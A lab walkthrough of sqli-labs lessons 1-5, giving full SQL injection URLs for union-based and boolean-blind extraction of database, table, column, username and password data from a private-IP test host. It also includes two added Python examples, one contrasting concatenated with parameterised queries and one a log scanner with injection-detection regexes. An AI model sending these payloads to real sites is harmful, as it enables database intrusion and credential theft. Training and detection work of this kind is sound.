sqli-labs walkthrough: Lessons 1-5

    Preface:

    It has been a long time since I did manual injection. Someone asked me about it and I had forgotten everything, so I am taking some time to refresh my memory on manual injection and run quickly through sqli-labs.

    Less-1 (GET, single-quote string injection)

    # Entering a single quote produces a database error
    http://192.168.1.115/sqli-labs/Less-1/?id=1%27
    

    # Determine the number of columns
    http://192.168.1.115/sqli-labs/Less-1/?id=1%27 order by 3%23
    http://192.168.1.115/sqli-labs/Less-1/?id=1%27 order by 4%23
    

    # Union query to check whether the page has a display position (an echoed column)
    http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,2,3%23
    

    # Query the database names
    http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,(select group_concat(schema_name)from information_schema.schemata),3%23
    

    # Query the table names
    http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")%23
    

    # Dump the column names
    http://192.168.1.115/sqli-labs/Less-1/?id=1000%27union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' %23
    

    # Dump the values
    http://192.168.1.115/sqli-labs/Less-1/?id=1000%27union select 1,group_concat(username,password),3 from users %23
    

    Less-2 (GET, integer injection)

    # Check whether the page changes
    http://192.168.1.115/sqli-labs/Less-2/?id=1 and 1=1
    http://192.168.1.115/sqli-labs/Less-2/?id=1 and 1=2
    # Determine the number of columns
    http://192.168.1.115/sqli-labs/Less-2/?id=1 order by 3%23
    http://192.168.1.115/sqli-labs/Less-2/?id=1 order by 4%23
    # Union query to find the display position
    http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,2,3
    # Dump the database names
    http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,(select group_concat(schema_name)from information_schema.schemata),3
    # Dump the table names
    http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")
    # Dump the column names
    http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
    # Dump the values
    http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,group_concat(username,password),3 from users
    

    Less-3 (GET, single-quote-with-parenthesis string injection)

    # Check the page's error message
    http://192.168.1.115/sqli-labs/Less-2/?id=1'
    http://192.168.1.115/sqli-labs/Less-3/?id=1%27)%20%23
    # Determine the number of columns
    http://192.168.1.115/sqli-labs/Less-3/?id=0%27) order by 3%23
    http://192.168.1.115/sqli-labs/Less-3/?id=0%27) order by 4%23
    # Union query to find the display position
    http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union%20select%201,2,3%23
    # Dump the database names
    http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,(select group_concat(schema_name)from information_schema.schemata),3%23
    # Dump the table names
    http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")%23
    # Dump the column names
    http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23
    # Dump the values
    http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,group_concat(username,password),3 from users%23
    

    Less-4 (GET, double-quote string injection)

    http://192.168.1.115/sqli-labs/Less-4/?id=1%22
    
    http://192.168.1.115/sqli-labs/Less-4/?id=1%22)%20%23
    

    Read the error message: the value is closed with a double quote and a right parenthesis, so close it with ") and then follow the same union-query procedure as in the earlier lessons.
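The reason the closer differs between Less-1, Less-2 and Less-3 is the way each lesson splices the id value into the SQL text; the following added example (not code from the original post or from sqli-labs) rebuilds those three query shapes over a constructed in-memory SQLite table, shows the error or silently altered result that string concatenation produces for the page's first probes, and puts the parameterised form beside it. The table layout and rows are constructed assumptions; SQLite is used only so the block runs offline.

```python
import sqlite3

# Constructed sample rows standing in for sqli-labs' security.users table.
SAMPLE_USERS = [(1, "alice", "s3cret"), (2, "bob", "hunter2")]

# How each lesson splices id into the SQL text. The closer the page tells you
# to send (' for Less-1, nothing for Less-2, ') for Less-3) is exactly what
# the wrapper puts after the value.
WRAPPERS = {
    "Less-1": "SELECT id, username, password FROM users WHERE id='{id}' LIMIT 0,1",
    "Less-2": "SELECT id, username, password FROM users WHERE id={id} LIMIT 0,1",
    "Less-3": "SELECT id, username, password FROM users WHERE id=('{id}') LIMIT 0,1",
}


def open_db():
    """In-memory SQLite database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, lesson, user_id):
    """String concatenation as in the lessons: returns the matching row, or
    the database error text that the walkthrough relies on to spot the bug."""
    sql = WRAPPERS[lesson].format(id=user_id)
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        return f"ERROR: {exc}"


def safe_lookup(conn, user_id):
    """Hardened form: id is bound as a parameter, so quotes, parentheses or
    'and 1=1' in the input are compared as data and never parsed as SQL."""
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (user_id,)).fetchone()


if __name__ == "__main__":
    db = open_db()
    for lesson, probe in (("Less-1", "1'"), ("Less-2", "1 and 1=1"), ("Less-3", "1')")):
        print(lesson, "vulnerable:", vulnerable_lookup(db, lesson, probe),
              "| safe:", safe_lookup(db, probe))
```

With the parameterised query every probe falls through to "no such id", which is also why the error-message step that opens each lesson tells a tester nothing on a fixed application.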

    Less-5 (boolean-based blind injection)

    # Determine the database version; left(code, 1) takes 1 character from the left of the code field
    http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(version(),1)=4 %23
    http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(version(),1)=5 %23
    
    # Determine the database name length with length(); binary search makes this more efficient
    http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())>5 %23
    http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())>10 %23
    http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())=8 %23
    
    # Guess the current database name; left(code, 1) takes 1 character from the left of the code field, and extending the prefix one character at a time up to the name's length recovers the database name
    http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)>'r' %23
    http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)>'t' %23
    http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)='s' %23
    http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)>'d' %23
    http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)>'f' %23
    http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)='e' %23
    ...
    
    # Determine the number of tables; count() counts records in a table and returns the number of rows matching the condition.
    http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and (select count(table_name) from information_schema.tables where table_schema=database())>0  %23
    
    # Determine the table name length; LIMIT forces a SELECT statement to return the specified number of rows.
    // SELECT * FROM table LIMIT 5,10; // returns rows 6-15
    http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5 %23
    http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>10 %23
    http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 %23
    
    # Guess the table names one character at a time; substr(string,start,length): string is the string to cut from, start is the starting position, length is the number of characters to take.
    http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>80 %23
    ... and so on in the same way
    
    # Determine the number of columns
    http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and (select count(column_name) from information_schema.columns where table_schema=database() and table_name = 'users')>0 %23
    
    # Determine the column name length
    http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select  column_name from information_schema.columns where table_schema=database() and table_name = 'users' limit 0,1)) > 0 %23
    
    # Guess the column names one character at a time
    http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name = 'users' limit 0,1),1,1))>79  %23
    
    # Determine the data
    http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select username from users limit 0,1),1,1))>79  %23
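Seen from the server side, every step in Lessons 1-5 leaves a distinctive request shape in the access log: ORDER BY probes, UNION SELECT with information_schema for the union-based lessons, and long runs of left()/length()/ascii(substr()) comparisons for the blind lesson. The following added example (not code from the original post or from sqli-labs) URL-decodes the request target the way the server does and flags those shapes; the log format and sample lines are constructed, and the signature names and threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) ')

# One pattern per step the walkthrough sends, applied after URL-decoding (%27 %20 %23 %3E -> ' space # >).
SIGNATURES = {
    "order-by-probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema-enum": re.compile(r"\binformation_schema\.", re.I),
    "boolean-blind": re.compile(r"\b(left|length|ascii|substr|substring)\s*\(", re.I),
    "comment-tail": re.compile(r"(#|--\s|/\*)"),
}

def classify_target(target):
    """Names of the signatures that fire on one decoded request target."""
    decoded = unquote_plus(target)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))

def scan_log(lines):
    """(ip, target, tags) for every request that trips at least one signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        tags = classify_target(m["target"]) if m else []
        if tags:
            hits.append((m["ip"], m["target"], tags))
    return hits

def blind_suspects(hits, threshold=3):
    """Boolean blind (Less-5) costs one true/false request per guess, so a
    burst of boolean-blind hits from one client is what to alert on."""
    per_ip = Counter(ip for ip, _, tags in hits if "boolean-blind" in tags)
    return {ip: n for ip, n in per_ip.items() if n >= threshold}

def _req(ip, target):
    """Constructed combined-format log line; timestamp and sizes are dummies."""
    return f'{ip} - - [17/Mar/2020:10:00:01 +0800] "GET {target} HTTP/1.1" 200 1024'

# Constructed sample log: a benign request, two Less-1 union steps, three Less-5 blind probes.
SAMPLE_LOG = [
    _req("198.51.100.7", "/sqli-labs/Less-1/?id=1"),
    _req("198.51.100.7", "/sqli-labs/Less-1/?id=1%27%20order%20by%203%23"),
    _req("198.51.100.7", "/sqli-labs/Less-1/?id=1000%27%20union%20select%201,"
         "(select%20group_concat(schema_name)from%20information_schema.schemata),3%23"),
    _req("203.0.113.9", "/sqli-labs/Less-5/?id=1%27%20and%20length(database())%3E5%20%23"),
    _req("203.0.113.9", "/sqli-labs/Less-5/?id=1%27%20and%20length(database())%3E10%20%23"),
    _req("203.0.113.9", "/sqli-labs/Less-5/?id=1%27%20and%20length(database())=8%20%23"),
]
```

Decoding before matching matters because the walkthrough's payloads arrive as %27/%20/%23; a filter that looks for a literal quote or "order by" in the raw URL misses all of them.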
    
    Original post: https://www.cnblogs.com/riyir/p/12617053.html